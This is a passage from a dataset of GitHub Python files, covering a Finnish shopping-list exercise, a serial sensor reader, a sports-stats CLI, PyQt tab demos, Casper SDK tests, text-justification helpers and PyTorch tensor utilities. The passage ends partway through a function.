metadata.\")\n","repo_name":"dasl-/piwall2","sub_path":"piwall2/broadcaster/screensaverhelper.py","file_name":"screensaverhelper.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9649317096","text":"class ShoppingList:\n\n list = []\n\n def add(self, product):\n self.list.append(product)\n\n def remove(self, product_index):\n self.list.pop(product_index - 1)\n\n def length(self):\n return len(self.list)\n\n def items(self):\n return self.list\n\n def __str__(self):\n return f\"\"\"Ostoslistasi sisältää seuraavat tuotteet:\n{self.list}\nVoit valita alla olevista toiminnoista:\n1) Lisää\n2) Poista\n0) Lopeta\"\"\"\n\n\ndef main():\n ostoslista = ShoppingList()\n\n while True:\n print(ostoslista)\n decision = int(input(\"Valintasi: \"))\n\n if decision == 1:\n new_product = input(\"Anna lisättävä tuote: \")\n print()\n ostoslista.add(new_product)\n elif decision == 2:\n print(f\"Ostoslistassasi on {ostoslista.length()} tuotetta.\")\n remove_number = int(input(\"Anna poistettavan tuotteen järjestysnumero: \"))\n print()\n ostoslista.remove(remove_number)\n elif decision == 0:\n print(f\"Sinulta jäi ostamatta seuraavat tuotteet:\\n{ostoslista.items()}\")\n break\n else:\n print(\"Tunnistamaton valinta.\\n\")\n\n print(\"Kiitos ohjelman käytöstä.\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Al1babax/Practices","sub_path":"Homework/Al1baba/LUT homework/Johdatus/L07-T1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15096125782","text":"import serial.tools.list_ports\nimport json\nimport struct\nimport math\nimport time\nimport random\nimport threading\n\n\nfrom open_gateway.sources.base import (\n BaseReader,\n BaseResultReaderMixin,\n BaseStreamReaderMixin,\n)\n\nBAUD_RATE = 460800\n\n\nclass SerialReader(BaseReader):\n name = \"SERIAL\"\n\n def __init__(self, config, device_id, **kwargs):\n\n super(SerialReader, self).__init__(config, device_id, **kwargs)\n self._port = device_id\n self._baud_rate = config.get(\"BAUD_RATE\", BAUD_RATE)\n print(\"BAUD rate set to\", self._baud_rate)\n\n @property\n def port(self):\n return self._port\n\n @property\n def baud_rate(self):\n return self._baud_rate\n\n def _write(self, command):\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n ser.write(str.encode(command))\n\n def _read_line(self, flush_buffer=False):\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n\n value = ser.readline()\n if flush_buffer:\n value = ser.readline()\n try:\n return value.decode(\"ascii\")\n except:\n return None\n\n def _read_serial_buffer(self, buffer_size):\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n return ser.read(buffer_size)\n\n def _flush_buffer(self):\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n return ser.reset_input_buffer()\n\n def get_port_info(self):\n ports = serial.tools.list_ports.comports()\n\n port_list = []\n for index, (port, desc, hwid) in enumerate(sorted(ports)):\n port_list.append({\"id\": index, \"name\": desc, \"device_id\": port})\n\n return port_list\n\n def list_available_devices(self):\n return self.get_port_info()\n\n\nclass SerialStreamReader(SerialReader, BaseStreamReaderMixin):\n def _send_subscribe(self):\n self._write(\"connect\")\n\n def read_device_config(self):\n\n try:\n config = json.loads(self._read_line(flush_buffer=True))\n except:\n self._write(\"disconnect\")\n time.sleep(1.0)\n config = json.loads(self._read_line(flush_buffer=True))\n\n if self._validate_config(config):\n return config\n\n raise Exception(\"Invalid Configuration File\")\n\n def _read_source(self):\n\n try:\n print(\"Serial: Reading source stream\")\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n\n self.streaming = True\n ser.reset_input_buffer()\n ser.read(self.source_buffer_size)\n\n if self.run_sml_model:\n sml = self.get_sml_model_obj()\n else:\n sml = None\n\n while self.streaming:\n\n data = ser.read(self.source_buffer_size)\n\n self.buffer.update_buffer(data)\n\n if self.run_sml_model:\n model_result = self.execute_run_sml_model(sml, data)\n if model_result:\n self.rbuffer.update_buffer([model_result]) \n\n time.sleep(0.00001)\n\n print(\"Serial: Sending disconnect command\")\n ser.write(str.encode(\"disconnect\"))\n\n except Exception as e:\n print(e)\n self.disconnect()\n raise e\n\n\nclass SerialResultReader(SerialReader, BaseResultReaderMixin):\n def set_app_config(self, config):\n config[\"DATA_SOURCE\"] = self.name\n config[\"DEVICE_ID\"] = self.port\n\n def _read_source(self):\n\n self._flush_buffer()\n\n self.streaming = True\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n while self.streaming:\n \n try:\n value = ser.readline() \n data = [value.decode(\"ascii\")]\n \n except Exception as e:\n print(e,)\n print(\"value\", value)\n continue\n\n \n if \"ModelNumber\" in data[0]:\n self.rbuffer.update_buffer(data)\n elif data[0]:\n print(data[0].rstrip())\n\n\nif __name__ == \"__main__\":\n port = \"/dev/ttyACM0\"\n buffer_size = 6 * 10\n config={'DATA_SOURCE':'RESULTS', \"DEVICE_ID\":\"COM4\"}\n sr = SerialResultReader(config, \"COM4\")\n sr.connect()\n sr._read_source()","repo_name":"sensiml/open-gateway","sub_path":"open_gateway/sources/serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"70"}
+{"seq_id":"41635332216","text":"#!/usr/bin/env python3\n\nimport click\n\nfrom grabstats.schedule import get_schedule\nfrom grabstats.box_score import box_scores_get_many, to_csv\n\n\n@click.command()\n@click.option(\n '-b',\n '--basic',\n 'basic_box_score_file',\n type=click.Path(),\n default='basic_box_score.csv',\n help='CSV file to write basic box score',\n)\n@click.option(\n '-a',\n '--adv',\n 'adv_box_score_file',\n type=click.Path(),\n default='adv_box_score.csv',\n help='CSV file to write advanced box score',\n)\n@click.option(\n '-dk',\n '--draftkings',\n 'calc_dk',\n is_flag=True,\n help='Calculate DraftKings fantasy points'\n)\n@click.option(\n '-fd',\n '--fanduel',\n 'calc_fd',\n is_flag=True,\n help='Calculate FanDuel fantasy points'\n)\n@click.argument(\n 'date',\n type=click.DateTime(formats=['%Y-%m-%d', '%Y-%m'])\n)\ndef main(date, basic_box_score_file, adv_box_score_file, calc_dk, calc_fd):\n print(date)\n year = '2019'\n month = '05'\n day = '03'\n schedule = get_schedule(year, month, day)\n basic_box_scores, adv_box_scores = box_scores_get_many(schedule)\n\n for box_score in basic_box_scores:\n to_csv(box_score, basic_box_score_file)\n\n for box_score in adv_box_scores:\n to_csv(box_score, adv_box_score_file)\n\n\nif __name__ == '__main__':\n main()","repo_name":"kndo/grabstats","sub_path":"grabstats/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22441542081","text":"import os\n\nfrom ase_parse import parse\n\n\ntheme_path = os.path.join(os.path.dirname(__file__), \"themes/\")\n\nfor theme_file in os.listdir(theme_path):\n fp = os.path.join(theme_path, theme_file)\n print(\"Parsing %s\" % theme_file)\n f = parse(fp)\n if not f:\n raise ValueError\n print(\" %s\" % f.data.palette.title)\n for color in f.data.palette.colors:\n print(\" (%s)\" % \", \".join([\"%.04f\" % f for f in color.color_values]))\n","repo_name":"Ahuge/ase_parser","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"40797426803","text":"#!/usr/bin/env python\n\n#from __future__ import print_function\nfrom util import TemporaryDirectory\nfrom plumbum import local, FG, cli\nfrom plumbum.cmd import git, rm, chmod\nimport logging\nfrom util import logfmt\nimport sys\n\nlogger = logging.getLogger()\nlogging.basicConfig(level=logging.DEBUG, format=logfmt(__file__))\n\nclass App(cli.Application):\n DESCRIPTION = \"Makes a read-only version of tract_querier with a \\\nparticular commit. Output is 'tract_querier-'.\"\n\n prefix = cli.SwitchAttr('-d', cli.ExistingDirectory, help=\"Root directory in which to install repo\", default=local.path('/data/pnl/soft'))\n githash = cli.SwitchAttr('-g', help='GitHub hash commit. If omitted will get latest commit from the master branch.')\n\n def main(self):\n repo = 'https://github.com/demianw/tract_querier.git'\n with TemporaryDirectory() as tmpdir:\n clone = local.path(tmpdir) / \"tract_querier\"\n if not self.githash:\n git(\"clone\", \"--depth\", \"1\", repo, clone)\n else:\n git(\"clone\", repo, clone)\n clone_hash = git(\"rev-parse\", \"--short\", \"HEAD\")[:-1] # remove trailing \\n\n # save 70M of space\n rm('-r', clone / 'doc')\n rm('-r', clone / '.git')\n out = self.prefix / \"tract_querier-\"+clone_hash\n clone.move(out)\n chmod('-R', 'a-w', out)\n\nif __name__ == '__main__':\n App.run()\n","repo_name":"reckbo/ppl","sub_path":"scripts/maketractquerier.py","file_name":"maketractquerier.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"21174893628","text":"import getRequestDetail\nfrom Framework.storeJSONData import store_jsondata\n\n\ndef view_request(req_id):\n details = getRequestDetail.getRequestDetail().getRequest(req_id)\n if details == \"No Request\":\n response = \"Your request does not exist in Database. Please give a valid id!!\"\n elif details == None:\n response = \"Sorry! service desk server is not able to authenticate you.\"\n else:\n # status = details['requestInfo']['status']\n response = \"Thank you for giving request_id. What information do you want for your request?\"\n # print(\"************************\" + str(details))\n store_jsondata(details)\n return response\n\n\n\n","repo_name":"PawanKGupta/facebook-chatbot","sub_path":"viewRequest.py","file_name":"viewRequest.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"22651789708","text":"import sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import * \nclass popup1(QDialog):\n def __init__(self,index=None,tabwidget=None):\n super().__init__()\n self.title = \"App\"\n self.index=index\n self.tabwidget=tabwidget\n self.text=\"\"\n #self.tablefirsttime=0\n self.InitUI()\n def InitUI(self):\n #a=QFrame()\n #print(\"start\")\n screen = app.primaryScreen()\n size = screen.size()\n # MainWindow.resize(size.width()*80/100, size.height()*80/100)\n self.resize(int(size.width()*25/100),int(size.height()*18/100))\n self.setWindowModality(Qt.ApplicationModal)\n self.setWindowFlags(Qt.WindowStaysOnTopHint)\n self.setStyleSheet('background-color:white;')\n # self._gif =QLabel(self)\n # self._gif.move(215,30)\n # self._gif.setStyleSheet('background-color:white;border:0px solid white')\n # movie = QMovie(\"as4.gif\")\n # self._gif.setMovie(movie)\n # movie.setSpeed(500)\n # movie.start()\n label1 = QLabel('Rename',self)\n label1.setFont(QFont('Arialbold', 20))\n label1.setStyleSheet('background-color:white;border:0px solid white')\n hbox = QHBoxLayout()\n hbox.addStretch(1)\n hbox.addWidget(label1)\n hbox.addStretch(1)\n \n label2 = QLabel(\"Are you sure you want to rename the tab ?\",self)\n label2.setFont(QFont('Arial', 12))\n label2.setStyleSheet('background-color:white;border:0px solid white')\n hbox2 = QHBoxLayout()\n hbox2.addStretch(1)\n hbox2.addWidget(label2)\n hbox2.addStretch(1)\n \n label3 = QLabel(\"Name of tab:\",self)\n label3.setFont(QFont('Arial', 12))\n label3.setStyleSheet('background-color:white;border:0px solid white')\n self.plainTextEdit = QtWidgets.QLineEdit(self)\n self.plainTextEdit.textChanged.connect(self.textchanged)\n # self.plainTextEdit.setFixedSize(200, 20)\n \n hbox3 = QHBoxLayout()\n hbox3.addStretch(1)\n hbox3.addWidget(label3)\n hbox3.addWidget(self.plainTextEdit)\n hbox3.addStretch(1)\n\n okButton = QPushButton(\"Yes\")\n okButton.setFixedSize(150, 50)\n okButton.setFont(QFont('Arial', 12))\n okButton.setStyleSheet('background-color:#103F91;color:white')\n okButton.clicked.connect(self.call_yes)\n cancelButton = QPushButton(\"No\")\n cancelButton.setFixedSize(150, 50)\n cancelButton.setFont(QFont('Arial', 12))\n cancelButton.setStyleSheet('background-color:#F22323;color:white')\n cancelButton.clicked.connect(self.call_no)\n \n hbox4 = QHBoxLayout()\n hbox4.addStretch(1)\n hbox4.addWidget(okButton)\n hbox4.addWidget(cancelButton)\n \n vbox = QVBoxLayout()\n # vbox.addStretch(1)\n vbox.addLayout(hbox)\n # vbox.addStretch(0.1)\n vbox.addLayout(hbox2)\n vbox.addStretch(1)\n vbox.addLayout(hbox3)\n vbox.addStretch(1)\n vbox.addLayout(hbox4)\n self.setLayout(vbox)\n # self.vbox=QVBoxLayout(self)\n # self.vbox.setAlignment(Qt.AlignCenter)\n # # self.vbox.addWidget(self.label)\n # self.setLayout(self.vbox)\n # self.hbox = QHBoxLayout(self)\n\n # label1.move(236,130)\n\n # label2.move(50,170)\n # self.vbox.addWidget(label1)\n # self.vbox.addStretch(1)\n # self.vbox.addWidget(label2)\n # self.plainTextEdit = QtWidgets.QLineEdit(self)\n # self.plainTextEdit.textChanged.connect(self.textchanged)\n # yes = QPushButton(\"no\", self)\n # yes.setGeometry(155,240,240,80)\n # yes.setFont(QFont('Arial', 21))\n # yes.setStyleSheet('background-color:#4299ff; color: white')\n # yes.clicked.connect(self.call_yes)\n # no = QPushButton(\"no\", self)\n # no.setGeometry(155,240,240,80)\n # no.setFont(QFont('Arial', 21))\n # no.setStyleSheet('background-color:#4299ff; color: white')\n # no.clicked.connect(self.call_no)\n #self.show()\n #a.show()\n def textchanged(self,text):\n print(text)\n # print \"contents of text box: \"+text\n self.text=text\n\n def call_yes(self):\n self.tabwidget.setTabText(self.index,self.text)\n self.close()\n\n def call_no(self):\n self.close()\n # self.tabwidget.setTabText(self.index,self.text)\n # self.close()\n #self.destroy()\n #gc.collect() \n\nclass TabExample(QMainWindow):\n def __init__(self):\n super(TabExample, self).__init__()\n self.setWindowTitle(\"Tab example\")\n\n # Create widgets\n self.tab_widget = QtWidgets.QTabWidget()\n self.setCentralWidget(self.tab_widget)\n\n # Label's to fill widget\n self.label1 = QtWidgets.QLabel(\"Tab 1\")\n self.label2 = QtWidgets.QLabel(\"Tab 2\")\n\n # Adding tab's\n self.tab_widget.addTab(self.label1, \"Tab 1\")\n self.tab_widget.addTab(self.label2, \"Tab 2\")\n self.tab_widget.setTabsClosable(True)\n self.tab_widget.tabCloseRequested.connect(lambda index: self.demofunction(index)) \n self.tab_widget.tabBarDoubleClicked.connect(lambda index: self.rename_tab(index))\n\n # Tab button's\n # self.right = self.tab_widget.tabBar().LeftSide\n # self.tab_widget.tabBar().setTabButton(0, self.right, TabButtonWidget())\n # self.tab_widget.tabBar().setTabButton(1, self.right, TabButtonWidget())\n\n # Tab settings\n self.tab_widget.tabBar().setMovable(True)\n\n self.show()\n\n def rename_tab(self,index):\n self.x=popup1(index,self.tab_widget)\n self.x.show()\n print(\"pass\",index)\n\n def demofunction(self,index):\n self.tab_widget.removeTab(index);\n # delete tabWidget_->widget(index);\n # self.tab_widget.setTabText(index,\"faisal\")\n print(\"pass\",index) \n # self.show() \n\nclass TabButtonWidget(QtWidgets.QWidget):\n def __init__(self):\n super(TabButtonWidget, self).__init__()\n # Create button's\n self.button_add = QtWidgets.QPushButton(\"+\")\n # self.button_remove = QtWidgets.QPushButton(\"-\")\n\n # Set button size\n self.button_add.setFixedSize(16, 16)\n # self.button_remove.setFixedSize(16, 16)\n\n # Create layout\n self.layout = QtWidgets.QVBoxLayout()\n self.layout.setSpacing(0)\n self.layout.setContentsMargins(0, 0, 0, 0)\n\n # Add button's to layout\n self.layout.addWidget(self.button_add)\n # self.layout.addWidget(self.button_remove)\n\n # Use layout in widget\n self.setLayout(self.layout)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n gui = TabExample()\n sys.exit(app.exec_())","repo_name":"syedfaisalsaleeem/PyQt5-DataVisualizer-Applcation","sub_path":"MDG-PYQT/tabs_modeling_2.py","file_name":"tabs_modeling_2.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4548756910","text":"import heapq\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n freq = {}\n for x in range(len(nums)):\n if nums[x] in freq:\n freq[nums[x]]+=1\n else:\n freq[nums[x]] = 1\n freq_arr = [(-v,k) for k,v in freq.items()]\n maxheap = heapq.heapify(freq_arr)\n final_arr = []\n for x in range(k):\n final_arr.append(heapq.heappop(freq_arr)[1])\n \n return final_arr","repo_name":"hasija/leetcode","sub_path":"347. Top K Frequent Elements.py","file_name":"347. Top K Frequent Elements.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3629387544","text":"#!/usr/bin/env python3\n\nimport xarray as xr\nimport numpy as np\n\ncdr3_anch_v = np.random.randint(0, 10, 10)\ncdr3_anch_j = np.random.randint(0, 3, 5) \n\n# cdr3_anch_v[4] = None\n# cdr3_anch_j[2] = np.nan\n\nprint(type(cdr3_anch_v))\nprint(type(cdr3_anch_j))\nprint(cdr3_anch_j.dtype)\n\nds = xr.Dataset(\n {\n \"anch_cdr3__v_choice\" : ((\"v_choice\"), cdr3_anch_v),\n \"anch_cdr3__j_choice\" : ((\"j_choice\"), cdr3_anch_j),\n },\n {\n \"v_choice\" : np.arange(10),\n \"j_choice\" : np.arange(5)\n }\n )\n\nprint(ds)\n\n\na = np.ma.array([1,2,3,4,5], dtype=int)\na[1] = np.ma.masked\n#masked_array(data = [1 -- 3 4 5],\n# mask = [False True False False False],\n# fill_value = 999999)\n#\nprint(a)\nprint(a[4] + 100)\nprint(type(a[1]))\nm = a[1] + 100\nprint(type(m))\n\nbbb = np.array([2,3,5])\nprint(bbb.dtype)\n\nstr_sequence = \"AGCCTGAA\"\nsst = str_sequence[a[1]:]\nprint(str_sequence)\nprint(sst)\n\n\n","repo_name":"alfaceor/programming-examples","sub_path":"python_a/xarray/ex_dataset.py","file_name":"ex_dataset.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"7214552363","text":"import os\nimport tempfile\n\nimport pycspr\n\n\ndef test_that_deploy_is_unapproved_when_instantiated(deploy_params, cp2):\n deploy = _create_deploy(deploy_params, cp2)\n assert len(deploy.approvals) == 0\n\n\ndef test_that_deploy_can_be_approved(deploy_params, cp1, cp2):\n deploy = _create_deploy(deploy_params, cp2)\n deploy.set_approval(pycspr.factory.create_deploy_approval(deploy, cp1))\n assert len(deploy.approvals) == 1\n assert deploy.approvals[0].signer == cp1.as_public_key\n\n\ndef test_that_deploy_can_be_approved_by_multiple_parties(deploy_params, cp1, cp2):\n deploy = _create_deploy(deploy_params, cp2)\n deploy.set_approval(pycspr.factory.create_deploy_approval(deploy, cp1))\n deploy.set_approval(pycspr.factory.create_deploy_approval(deploy, cp2))\n assert len(deploy.approvals) == 2\n\n\ndef test_that_deploy_approvals_are_deduplicated(deploy_params, cp1, cp2):\n deploy = _create_deploy(deploy_params, cp2)\n for _ in range(10):\n deploy.set_approval(pycspr.factory.create_deploy_approval(deploy, cp1))\n deploy.set_approval(pycspr.factory.create_deploy_approval(deploy, cp2))\n assert len(deploy.approvals) == 2\n\n\ndef test_that_a_deploy_can_be_written_to_fs(deploy_params, cp1, cp2):\n deploy = _create_deploy(deploy_params, cp2)\n with tempfile.TemporaryFile() as fp:\n fpath = pycspr.write_deploy(deploy, str(fp))\n assert os.path.exists(fpath)\n os.remove(fpath)\n\n\ndef test_can_write_to_and_read_from_fs(deploy_params, cp1, cp2):\n deploy_1 = _create_deploy(deploy_params, cp2)\n with tempfile.TemporaryFile() as fp:\n fpath = pycspr.write_deploy(deploy_1, str(fp))\n deploy_2 = pycspr.read_deploy(fp)\n assert isinstance(deploy_2, type(deploy_1))\n assert pycspr.serialisation.to_json(deploy_1) == \\\n pycspr.serialisation.to_json(deploy_2)\n os.remove(fpath)\n\n\ndef _create_deploy(deploy_params, cp2):\n return pycspr.factory.create_transfer(\n deploy_params,\n amount=123456789,\n target=cp2.account_key,\n correlation_id=1\n )\n","repo_name":"casper-network/casper-python-sdk","sub_path":"tests/test_deploy_lifecycle.py","file_name":"test_deploy_lifecycle.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"70"}
+{"seq_id":"12346545054","text":"from __future__ import annotations\n\nimport typing\n\nfrom .. import spec\n\n\ndef hjustify(\n text: str,\n justification: spec.HorizontalJustification,\n width: int,\n) -> str:\n\n # account for rich formatting\n if '[' in text:\n import rich.text\n\n plain_width = rich.text.Text.from_markup(text).cell_len\n width += len(text) - plain_width\n\n if width < len(text):\n return text[:width]\n\n if justification == 'left':\n return text.ljust(width)\n elif justification == 'right':\n return text.rjust(width)\n elif justification == 'center':\n return text.center(width)\n elif justification == 'raw':\n return text[:width].ljust(width)\n else:\n raise Exception('unknown justification: ' + str(justification))\n\n\ndef vjustify(\n text: str,\n justification: spec.VerticalJustification,\n height: int,\n) -> str:\n\n n_lines = text.count('\\n') + 1\n\n # check if exceeds height\n if n_lines > height:\n return '\\n'.join(text.split('\\n')[:height])\n\n missing = height - n_lines\n if justification == 'top':\n return text + '\\n' * missing\n elif justification == 'bottom':\n return '\\n' * missing + text\n elif justification == 'center':\n top = int(missing / 2)\n bottom = missing - top\n return '\\n' * top + text + '\\n' * bottom\n else:\n raise Exception('unknown justification: ' + str(justification))\n\n\ndef concatenate_blocks(\n blocks: typing.Sequence[str | typing.Sequence[str]],\n *,\n gap: int | str | None = None,\n) -> str:\n \"\"\"concatenate blocks of text horizontally\"\"\"\n\n # split blocks into lines\n blocks_lines: typing.MutableSequence[typing.Sequence[str]] = []\n for block in blocks:\n if isinstance(block, str):\n blocks_lines.append(block.split('\\n'))\n else:\n blocks_lines.append(block)\n n_lines = len(blocks_lines[0])\n for block_lines in blocks_lines:\n if len(block_lines) != n_lines:\n raise Exception(\n 'every block needs to have the same number of lines'\n )\n\n if gap is None:\n gap = ''\n elif isinstance(gap, int):\n gap = ' ' * gap\n elif isinstance(gap, str):\n pass\n else:\n raise Exception('unknown gap format: ' + str(type(gap)))\n\n # concatenate into new lines\n new_lines = []\n for pieces in zip(*blocks_lines):\n new_lines.append(gap.join(pieces))\n\n return '\\n'.join(new_lines)\n\n\ndef indent_block(block: str, indent: typing.Union[str, int, None]) -> str:\n indent = indent_to_str(indent)\n lines = block.split('\\n')\n new_lines = [indent + line for line in lines]\n return '\\n'.join(new_lines)\n\n\ndef indent_to_str(indent: typing.Union[str, int, None]) -> str:\n \"\"\"convert input into an indent, whether a str or an int number of spaces\n\n useful for user facing functions with flexible input constraints\n \"\"\"\n if indent is None:\n return ''\n elif isinstance(indent, int):\n return ' ' * indent\n elif isinstance(indent, str):\n return indent\n else:\n raise Exception('unknown indent format')\n","repo_name":"sslivkoff/toolstr","sub_path":"toolstr/formats/positional_formats.py","file_name":"positional_formats.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"27244112064","text":"import os\nimport copy\nimport numpy as np\nfrom os.path import isfile\nimport torch\nimport binvox_rw\nimport torch.nn.functional as F\nEPS = 1e-6\n\nuse_cuda = torch.cuda.is_available()\nDEVICE = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\ndef assert_same_shape(t1, t2):\n for (x, y) in zip(list(t1.shape), list(t2.shape)):\n assert(x==y)\n\ndef print_stats_py(name, tensor):\n print('%s (%s) min = %.2f, mean = %.2f, max = %.2f' % (name, tensor.dtype, torch.min(tensor), torch.mean(tensor), torch.max(tensor)))\n\ndef tensor2summ(tensor, permute_dim=False):\n # if permute_dim = True:\n # for 2D tensor, assume input is torch format B x S x C x H x W, we want B x S x H x W x C\n # for 3D tensor, assume input is torch format B x S x C x H x W x D, we want B x S x H x W x C x D\n # and finally unbind the sequeence dimension and return a list of [B x H x W x C].\n assert(tensor.ndim == 5 or tensor.ndim == 6)\n assert(tensor.size()[1] == 2) #sequense length should be 2\n if permute_dim:\n if tensor.ndim == 6: #3D tensor\n tensor = tensor.permute(0, 1, 3, 4, 5, 2)\n elif tensor.ndim == 5: #2D tensor\n tensor = tensor.permute(0, 1, 3, 4, 2)\n\n tensor = torch.unbind(tensor, dim=1)\n return tensor\n\ndef normalize_single(d):\n # d is a whatever shape torch tensor\n dmin = torch.min(d)\n dmax = torch.max(d)\n d = (d-dmin)/(EPS+(dmax-dmin))\n return d\n\ndef normalize(d):\n # d is B x whatever. normalize within each element of the batch\n out = torch.zeros(d.size()) # (1, 3, 32, 32)\n if d.is_cuda:\n out = out.cuda()\n B = list(d.size())[0]\n for b in range(B):\n out[b] = normalize_single(d[b])\n return out # this makes embedding to lie between (0 and 1)\n\ndef reduce_masked_mean(x, mask, dim=None, keepdim=False):\n # x and mask are the same shape\n # returns shape-1\n # axis can be a list of axes\n assert(x.size() == mask.size())\n prod = x*mask # would become zero in certain locations\n if dim is None:\n numer = torch.sum(prod)\n denom = EPS+torch.sum(mask)\n\n else:\n numer = torch.sum(prod, dim=dim, keepdim=keepdim)\n denom = EPS+torch.sum(mask, dim=dim, keepdim=keepdim)\n\n mean = numer/denom\n return mean\n\ndef pack_seqdim(tensor, B):\n shapelist = list(tensor.shape)\n B_, S = shapelist[:2]\n assert(B==B_)\n otherdims = shapelist[2:]\n tensor = torch.reshape(tensor, [B*S]+otherdims)\n return tensor\n\ndef unpack_seqdim(tensor, B):\n shapelist = list(tensor.shape)\n BS = shapelist[0]\n assert(BS%B==0)\n otherdims = shapelist[1:]\n S = int(BS/B)\n tensor = torch.reshape(tensor, [B,S]+otherdims)\n return tensor\n\ndef gridcloud3D(B, Z, Y, X, norm=False, device=None):\n # we want to sample for each location in the grid\n grid_z, grid_y, grid_x = meshgrid3D(B, Z, Y, X, norm=norm, device=device)\n x = torch.reshape(grid_x, [B, -1])\n y = torch.reshape(grid_y, [B, -1])\n z = torch.reshape(grid_z, [B, -1])\n # these are B x N\n xyz = torch.stack([x, y, z], dim=2)\n # this is B x N x 3\n return xyz\n\ndef gridcloud3D_py(Z, Y, X):\n # we want to sample for each location in the grid\n grid_z, grid_y, grid_x = meshgrid3D_py(Z, Y, X) # 0 - 31 is broken into 32 parts\n x = np.reshape(grid_x, [-1])\n y = np.reshape(grid_y, [-1])\n z = np.reshape(grid_z, [-1])\n # these are N = 32x32x32\n xyz = np.stack([x, y, z], axis=1)\n # this is N x 3\n return xyz\n\ndef meshgrid2D_py(Y, X):\n grid_y = np.linspace(0.0, Y-1, Y)\n grid_y = np.reshape(grid_y, [Y, 1])\n grid_y = np.tile(grid_y, [1, X])\n\n grid_x = np.linspace(0.0, X-1, X)\n grid_x = np.reshape(grid_x, [1, X])\n grid_x = np.tile(grid_x, [Y, 1])\n\n return grid_y, grid_x\n\ndef gridcloud2D_py(Y, X):\n # we want to sample for each location in the grid\n grid_y, grid_x = meshgrid2D_py(Y, X)\n x = np.reshape(grid_x, [-1])\n y = np.reshape(grid_y, [-1])\n # these are N\n xy = np.stack([x, y], axis=1)\n # this is N x 2\n return xy\n\ndef normalize_grid3D(grid_z, grid_y, grid_x, Z, Y, X):\n # make things in [-1,1]\n grid_z = 2.0*(grid_z / float(Z-1)) - 1.0\n grid_y = 2.0*(grid_y / float(Y-1)) - 1.0\n grid_x = 2.0*(grid_x / float(X-1)) - 1.0\n return grid_z, grid_y, grid_x\n\ndef normalize_grid2D(grid_y, grid_x, Y, X):\n # make things in [-1,1]\n grid_y = 2.0*(grid_y / float(Y-1)) - 1.0\n grid_x = 2.0*(grid_x / float(X-1)) - 1.0\n return grid_y, grid_x\n\ndef normalize_gridcloud(xyz, Z, Y, X):\n # make things in [-1,1]\n x = xyz[...,0]\n y = xyz[...,1]\n z = xyz[...,2]\n\n z = 2.0*(z / float(Z-1)) - 1.0\n y = 2.0*(y / float(Y-1)) - 1.0\n x = 2.0*(x / float(X-1)) - 1.0\n\n xyz = torch.stack([x,y,z], dim=-1)\n return xyz\n\ndef normalize_gridcloud3D(xyz, Z, Y, X, clamp_extreme=True):\n # make things in [-1,1]\n x = xyz[...,0]\n y = xyz[...,1]\n z = xyz[...,2]\n\n z = 2.0*(z / float(Z-1)) - 1.0\n y = 2.0*(y / float(Y-1)) - 1.0\n x = 2.0*(x / float(X-1)) - 1.0\n\n xyz = torch.stack([x,y,z], dim=-1)\n\n if clamp_extreme:\n xyz = torch.clamp(xyz, min=-2.0, max=2.0)\n return xyz\n\ndef meshgrid3D_yxz(B, Y, X, Z):\n # returns a meshgrid sized B x Y x X x Z\n # this ordering makes sense since usually Y=height, X=width, Z=depth\n\n\tgrid_y = torch.linspace(0.0, Y-1, Y)\n\tgrid_y = torch.reshape(grid_y, [1, Y, 1, 1])\n\tgrid_y = grid_y.repeat(B, 1, X, Z)\n\n\tgrid_x = torch.linspace(0.0, X-1, X)\n\tgrid_x = torch.reshape(grid_x, [1, 1, X, 1])\n\tgrid_x = grid_x.repeat(B, Y, 1, Z)\n\n\tgrid_z = torch.linspace(0.0, Z-1, Z)\n\tgrid_z = torch.reshape(grid_z, [1, 1, 1, Z])\n\tgrid_z = grid_z.repeat(B, Y, X, 1)\n\n\treturn grid_y, grid_x, grid_z\n\ndef meshgrid2D(B, Y, X, stack=False, norm=False, device=DEVICE):\n # returns a meshgrid sized B x Y x X\n\n grid_y = torch.linspace(0.0, Y-1, Y, device=device)\n grid_y = torch.reshape(grid_y, [1, Y, 1])\n grid_y = 